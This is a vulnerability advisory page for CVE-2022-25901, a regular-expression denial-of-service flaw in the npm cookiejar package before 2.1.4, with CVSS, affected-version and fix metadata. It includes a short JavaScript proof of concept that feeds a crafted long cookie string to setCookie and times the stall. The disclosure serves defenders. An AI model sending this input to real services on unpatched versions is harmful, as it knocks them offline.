Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS1oNDUyLTc5OTYtaDQ1aM4AAxDY

cookiejar Regular Expression Denial of Service via Cookie.parse function

Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed to cookie values or attempted to parse from request headers.

Proof of concept:

ts\nconst { CookieJar } = require("cookiejar");

const jar = new CookieJar();

const start = performance.now();

const attack = "a" + "t".repeat(50_000);
jar.setCookie(attack);

console.log(`CookieJar.setCookie(): ${performance.now() - start}ms`);

CookieJar.setCookie(): 2963.214399999939ms
Permalink: https://github.com/advisories/GHSA-h452-7996-h45h
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNDUyLTc5OTYtaDQ1aM4AAxDY
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 1 year ago
Updated: over 1 year ago


CVSS Score: 5.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Identifiers: GHSA-h452-7996-h45h, CVE-2022-25901
References: Repository: https://github.com/bmeck/node-cookiejar
Blast Radius: 30.0

Affected Packages

maven:org.webjars.npm:cookiejar
Dependent packages: 4
Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 2.1.3
No known fixed version
All affected versions: 2.0.6, 2.1.0, 2.1.1, 2.1.2, 2.1.3
npm:cookiejar
Dependent packages: 179
Dependent repositories: 449,261
Downloads: 32,561,812 last month
Affected Version Ranges: < 2.1.4
Fixed in: 2.1.4
All affected versions: 1.0.0, 1.0.3, 1.0.5, 1.1.0, 1.1.1, 1.2.0, 1.3.0, 1.3.1, 1.3.2, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.6, 2.1.0, 2.1.1, 2.1.2, 2.1.3
All unaffected versions: 2.1.4